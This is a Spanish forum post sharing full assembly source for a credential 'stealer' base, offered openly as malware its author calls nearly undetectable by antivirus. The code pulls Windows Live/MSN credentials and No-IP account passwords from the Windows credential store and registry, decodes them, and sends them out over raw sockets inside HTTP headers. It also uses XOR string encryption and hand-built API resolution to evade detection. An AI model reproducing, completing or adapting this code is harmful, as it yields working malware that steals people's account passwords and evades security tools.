[SRC]Base de stealer en ASM

Hola,publico una pequeña base de un stealer de momento roba Claves del MSN live y De No IP y manda cabezeras y es casi FUD( 1 on 24 (4,16 %)) .
Código
; by
;      y      y   yyy     yyyyyyyyyyyyy
;       y    y   y             y
;        y  y    yyyyyy        y
;         yy          y        y
;         y           y        y
;         y           y        y
;         y     yyyyyyy        y
;Mail:ysk_sft@hotmail.com
macro encrypt dstart,dsize {
    local ..char,..key,..shift
    repeat dsize
        load ..char from dstart+%-1
        ..char = ..char xor $17
        store ..char at dstart+%-1
    end repeat
}
 
format MS COFF
  include 'win32ax.inc'
section '.text' code readable executable
 
 
public  Main         as      '_Main'
 
proc Main
locals
GBuffer dd ?
cCabezeras dd ?
endl
stdcall EncriptacionXOR,var,finvar-var
stdcall GetModuleHW,cKernel32
mov ebx,eax
stdcall GetAddressFunction,ebx,cGlobalAlloc
stdcall eax,GPTR,[KTamaño]
push eax
pop  [cCabezeras]
stdcall GetAddressFunction,ebx,cLoadLibraryW
mov edi,eax
stdcall eax,cWSOCK32
stdcall edi,cUser32
stdcall GetAddressFunction,eax,cwsprintf
stdcall eax, [cCabezeras] ,cabezeras,cArchivo,cHost
stdcall GetAddressFunction,ebx,cGlobalAlloc
stdcall eax,GPTR,4048
push eax
pop [GBuffer]
stdcall MsnLiveGet,[GBuffer]
.if eax <> 0
stdcall GetModuleHW,cNtdll
stdcall GetAddressFunction,eax,cstrcat
mov ebx,eax
stdcall eax,[cCabezeras],CabezeraMsnLive
stdcall ebx,[cCabezeras],[GBuffer]
.endif
 
stdcall Zerar,[GBuffer] ,4048
stdcall NoIpGet,[GBuffer]
.if eax <> 0
stdcall GetModuleHW,cNtdll
stdcall GetAddressFunction,eax,cstrcat
mov ebx,eax
stdcall eax,[cCabezeras],CabezeraNoIp
stdcall ebx,[cCabezeras],[GBuffer]
.endif
stdcall Zerar,[GBuffer] ,4040
stdcall GetModuleHW,cNtdll
stdcall GetAddressFunction,eax,cstrcat
stdcall eax,[cCabezeras],FinCabezeras
stdcall MandarDatos, [cCabezeras],cHost,809,0
 
leave
ret
endp
 
proc Zerar,Puntero,Cantidad  ;Funcion que llena de 0 una posicion
push ecx
push ebx
mov ecx,[Cantidad]
mov ebx,[Puntero]
.bucle:
mov byte[ebx+ecx],0
loop .bucle
mov byte[ebx],0
pop ebx
pop ecx
 ret
endp
 
 
proc MandarDatos,cDatos,cIP,cPort,cCantidadASumar
locals
 WD WSADATA ?
 cWSOCKPOS dd ?
 cSock dd ?
 cSin sockaddr_in
endl
stdcall GetModuleHW,cWSOCK32
mov [cWSOCKPOS],eax
 
stdcall ObtenerDireccion,[cWSOCKPOS],cWSAStartup
stdcall eax,200,addr WD
 
stdcall ObtenerDireccion,[cWSOCKPOS],csocket
stdcall eax,AF_INET,SOCK_STREAM,0
mov [cSock],eax
 
stdcall HTONS ,[cPort]
mov [cSin.sin_family],2
mov [cSin.sin_port],ax
mov eax,[cCantidadASumar]
add [cIP],eax
.Reintentar:
stdcall GetModuleHW,cKernel32
stdcall GetAddressFunction,eax,cSleepEx
stdcall eax,1000,FALSE
stdcall ObtenerDireccion,[cWSOCKPOS],cgethostbyname
stdcall eax,[cIP]
    cmp eax,0
    jne @f
 
    jmp .Reintentar
 
    @@:
        virtual at eax
        .host   hostent
        end     virtual
       mov     eax,[.host.h_addr_list]
        mov     eax,[eax]
        mov     eax,[eax]
 mov [cSin.sin_addr],eax
 .BConectar:
 stdcall GetModuleHW,cKernel32
stdcall GetAddressFunction,eax,cSleepEx
stdcall eax,100,FALSE
stdcall ObtenerDireccion,[cWSOCKPOS], cconnect
stdcall eax, [cSock],addr cSin,16
cmp eax,-1
je   .BConectar
 
stdcall ObtenerDireccion,[cWSOCKPOS],csend
mov ebx,eax
stdcall Len,[cDatos]
stdcall ebx,[cSock],[cDatos],eax,0
stdcall ObtenerDireccion,[cWSOCKPOS],cclosesocket
stdcall eax,[cSock]
stdcall ObtenerDireccion,[cWSOCKPOS],cWSACleanup
stdcall eax
ret
endp
 
proc HTONS,PUERTO:WORD ;Función igual a la api HTONS
push ecx
    MOVZX EAX,[PUERTO]
       XOR ECX,ECX
 
       MOV CH,AL
  SHR EAX,8
   OR ECX,EAX
    MOV AX,CX
 
       pop ecx
ret
endp
 
proc NoIpGet,cBuffer
locals
temp dd ?
Result dd ?
hAdvapi32 dd ?
endl
  stdcall GetModuleHW,cAdvapi32  ;Obtenemos el handle de la Advapi32.dll
 push eax
 pop [hAdvapi32]
 stdcall ObtenerDireccion,[hAdvapi32] ,cRegOpenKeyEx
 cmp eax,0
  jne @f
  xor eax,eax         ; Si no existen la api devolvemos eax = 0
 jmp  .salir
 @@:
 mov [temp],100
stdcall eax,HKEY_LOCAL_MACHINE,LlabeNoIp,0,KEY_READ, addr Result    ;Abrimos la cadena del registro donde estan los datos
.if eax <> 0 ;Si no hay datos devolvemos 0
xor eax,eax
jmp  .salir
.endif
 stdcall ObtenerDireccion,[hAdvapi32] ,cRegQueryValueEx
lea ebx,[temp]
stdcall eax,[Result],username,0,0,[cBuffer],ebx
.if eax <> 0 ;Si no hay datos devolvemos 0
xor eax,eax
jmp  .salir
.endif
stdcall Len ,[cBuffer]
add [cBuffer],eax
mov ax,word[puntos]
mov ebx,[cBuffer]
mov word[ebx],ax
inc [cBuffer]
inc [cBuffer]
 
 mov [temp],100
 stdcall ObtenerDireccion,[hAdvapi32] ,cRegQueryValueEx
lea ebx,[temp]
stdcall eax,[Result],password,0,0,[cBuffer],ebx
stdcall Len ,[cBuffer]
stdcall base64decode,[cBuffer],[cBuffer],eax
stdcall Len ,[cBuffer]
mov edi,eax
add [cBuffer],eax
mov ax,word[palos]
mov ebx,[cBuffer]
mov word[ebx],ax
add [cBuffer],2
mov eax,4000
sub eax,edi
stdcall Zerar, [cBuffer],eax
 .salir:
ret
endp
proc base64decode  source:DWORD, destination:DWORD, sourcelen:DWORD  ;descifra base64
push   esi
push   edi
push   ebx
 
mov    esi, [source] ; esi <- source
mov    edi, [destination] ; edi <- destination
mov    ecx, [sourcelen]
shr    ecx, 2
cld
 
;-------------[decoding part]---------------
 
@@outer_loop:
push   ecx
mov    ecx, 4
xor    ebx, ebx
lodsd
@@inner_loop:
push   eax
and    eax, 0ffh
mov    al, byte[base64table+eax]
cmp    al, 255
je     @@invalid_char
shl    ebx, 6
or     bl, al
pop    eax
shr    eax, 8
dec    ecx
jnz    @@inner_loop
mov    eax, ebx
shl    eax, 8
xchg   ah, al
ror    eax, 16
xchg   ah, al
stosd
dec    edi
pop    ecx
dec    ecx
jnz    @@outer_loop
xor    eax, eax
jmp    @@decode_done
 
;-------------------------------------------
 
@@invalid_char:
mov    eax, -1
@@decode_done:
pop    ebx
pop    edi
pop    esi
ret
endp
proc MsnLiveGet,cBuffer
locals
hAdvapi32 dd ?  ; Handle de la Advapi32.dll
lCount dd ? ;Cantidad de cuentas
lCred dd ?
endl
 stdcall GetModuleHW,cAdvapi32  ;Obtenemos el handle de la Advapi32.dll
 push eax
 pop [hAdvapi32] ; Lo guardaamos en hAdvapi32
 
 stdcall ObtenerDireccion,eax,cCredEnumerateW
 cmp eax,0
  jne @f
  xor eax,eax         ; Si no existen la api devolvemos eax = 0
 jmp  .salir
 @@:
 stdcall eax,cred, 0, addr lCount,addr lCred
  cmp [lCount],0
  jne @f
  xor eax,eax         ; Si no existen cuentas devolvemos eax = 0
 jmp  .salir
 @@:
 mov ebx,[lCred]
 .BucleQueSacaLasCuentas:
 mov eax,dword[ebx]
 add dword[eax+8]  ,34
 ; dword[eax+8] = User
 ; dword[eax+28] = Clave
 
 stdcall UniToAscii,[cBuffer],dword[eax+8]
 push eax
 stdcall Len,[cBuffer]
 add [cBuffer],eax
 pop eax
 mov edi,[cBuffer]
 mov si,word[puntos]
 mov word[edi],si
 add  [cBuffer],2
 .if   dword[eax+28] <> 0
  stdcall UniToAscii,[cBuffer],dword[eax+28]
  .endif
   stdcall Len,[cBuffer]
   add  [cBuffer],eax
   mov eax,[cBuffer]
   mov si,word[palos]
   mov word[eax],si
   add [cBuffer],2
 
 dec  [lCount]
 .if [lCount] = 0
 mov eax,TRUE
 jmp .salir
 .endif
 add ebx,4
 jmp .BucleQueSacaLasCuentas
 
 .salir:
ret
endp
 
proc UniToAscii, ascii, unicode  ;Función que pasa unicode a ascii
push eax
push esi
push edi
mov edi,[unicode]
mov esi,[ascii]
dec esi
sub edi,2
.bucle_:
inc esi
add edi,2
mov al,byte[edi]
mov byte[esi],al
cmp word[edi],00
jne .bucle_
pop edi
pop esi
pop eax
ret
endp
 
proc ObtenerDireccion,hLib,cApi ;Función para obtener la direccion de algunas apis donde la otra funcion no anda
 stdcall GetModuleHW,cKernel32
stdcall GetAddressFunction,eax,cGetProcAddress ;Sacamos la direccion del GetProcAddress para obtener la dirección del api
stdcall eax,[hLib],[cApi]
ret
endp
 
;Función que simula GetModuleHandleW
proc GetModuleHW,cName
push ebx edi esi
.if [cName] = 0
mov eax,dword [fs:18h]
mov eax,dword [eax+30h]
mov eax,dword [eax+8h] 
jmp .salir
.endif
mov eax,[fs:30h]
mov eax,[eax+0Ch]
mov edi,[eax+10h]
mov esi,dword[edi+30h]
.siguiente:
mov ebx,dword[edi+30h]
stdcall compararW,[cName],ebx
.if eax <> 0
mov edi,[edi+4h]
cmp esi,dword[edi+30h]
jne  .siguiente
jmp .salir
.endif
mov eax,dword[edi+18h]
jmp .salir
.error:
xor eax,eax
.salir:
pop edi ebx
ret
endp
;Función que simula GetProcAddress
; LibHandle = Handle otorgado por GetModulehandle o LoadLibrary.
; Api = Nombre de la función .
;  By YST
proc GetAddressFunction,LibHandle,Api
locals
AddressOfNames dd ?
AddressOfFunctions dd ?
endl
push ebx edx edi ecx esi
mov eax,[LibHandle]
cmp eax,NULL
je .Error
mov ebx, dword[eax + 03Ch]
add ebx,eax
cmp word[ebx],"PE"
jne .Error
mov esi,dword[ebx+078h]
mov ebx,esi
add ebx,eax
push dword[ebx+20h]
pop [AddressOfNames]
add [AddressOfNames] ,eax
mov ecx,dword[ebx+018h]
xor edi,edi
add eax ,esi
push dword[eax+1ch]
pop [AddressOfFunctions]
sub eax,esi
add [AddressOfFunctions] ,eax
.encontrar:
dec ecx
mov eax,edi
rol eax,2
add eax,[AddressOfNames]
mov eax, dword[eax]
add eax, [LibHandle]
inc edi
stdcall comparar, [Api], eax
cmp ecx,NULL
je .Error
cmp eax, 0
jne .encontrar
dec edi
rol edi,2
mov eax,edi
add eax, [AddressOfFunctions]
mov eax, dword[eax]
add eax,[LibHandle]
pop esi ecx edi edx ebx
ret
.Error:
xor eax,eax ; xor eax,eax = NULL
pop esi ecx edi edx ebx
ret
endp
 
;Función que compara 2 cadenas en Unicode.
proc compararW ,SRC,DST
push edi ecx esi
mov ecx,-1
mov edi,[SRC]
mov ax,0000
repnz scasw
mov eax,ecx
not eax
mov ecx,eax
mov esi,[SRC]
mov edi,[DST]
repz cmpsb
mov eax,1
jnz .Next
dec eax
.Next:
pop esi ecx edi
ret
endp
 
;Función que cifra con un xor $FF cada byte de una cadena
; cCadena = Puntero de cadena a cifrar
; cTTamaño = Tamaño de cadena a cifrar .
;  By YST
proc EncriptacionXOR,cCadena,cTamaño
push ebx
xor ebx,ebx
mov ebx,[cTamaño]
jmp .Start
.Start:
mov eax,[cCadena]
inc ebx
dec eax
.bucle:
dec ebx
cmp ebx,0
jbe .salir
inc eax
xor byte[eax],$17
jmp .bucle
.salir:
pop ebx
ret
endp
 
proc Len,cCadena   ;Funcion que mide la cadena
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb
mov eax,ecx
not eax
dec eax
pop edi ecx
ret
endp
;Función que compara 2 cadenas en ascii.
proc comparar ,SRC,DST
push edi ecx esi
mov ecx,-1
mov edi,[SRC]
mov al,0
repnz scasb
mov eax,ecx
not eax
mov ecx,eax
mov esi,[SRC]
mov edi,[DST]
repz cmpsb
mov eax,1
jnz .Next
dec eax
.Next:
pop esi ecx edi
ret
endp
section '.data' data readable writeable
var:
 cWSOCK32 du 'wsock32.dll',0
cKernel32 du 'kernel32.dll',0
cAdvapi32 du 'ADVAPI32.dll',0
cNtdll du 'ntdll.dll',0
cUser32 du 'user32.dll',0
cGetProcAddress db 'GetProcAddress',0
;General
cLoadLibraryW db 'LoadLibraryW',0
cGlobalAlloc db 'GlobalAlloc',0
cstrcat db 'strcat',0
cwsprintf db 'wsprintfA',0
cSleepEx db 'SleepEx',0
;Separadores
palos db '||',0
puntos db '::',0
;Manejo del registro
cRegOpenKeyEx db 'RegOpenKeyExA',0
cRegQueryValueEx db 'RegQueryValueExA',0
;Claves NoIp
LlabeNoIp db 'SOFTWARE\Vitalwerks\DUC',0
username db 'Username',0
password db 'Password',0
;Claves MsnLive
cCredEnumerateW db 'CredEnumerateW',0
cred du 'WindowsLive:name=*',0
;Conexion a la web
cHost db 'localhost',0
cArchivo db '\',0
 cabezeras:
               db  "GET %s HTTP/1.1",13,10
               db  "Host: %s",13,10
               db  "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",0
FinCabezeras db  13,10,"Connection: close",13,10,13,10,0
CabezeraMsnLive db 13,10,'MsnLive: ',0
CabezeraNoIp db 13,10,'NIP: ' ,0
KTamaño dd $+100-cabezeras
 
csocket db 'socket',0
cgethostbyname db 'gethostbyname',0
cWSAStartup db 'WSAStartup',0
cconnect db 'connect',0
csend db 'send',0
cclosesocket db 'closesocket',0
cWSACleanup db 'WSACleanup',0
 
;Base64
base64table db 43 dup (255)
db 62,255,255,255,63,52,53,54,55,56,57,58,59,60,61,255
db 255,255,0,255,255,255,0,1,2,3,4,5,6,7,8,9,10,11,12,13
db 14,15,16,17,18,19,20,21,22,23,24,25,255,255,255,255
db 255,255,26,27,28,29,30,31,32,33,34,35,36,37,38
db 39,40,41,42,43,44,45,46,47,48,49,50,51
db 132 dup (255)
finvar:
encrypt var,finvar-var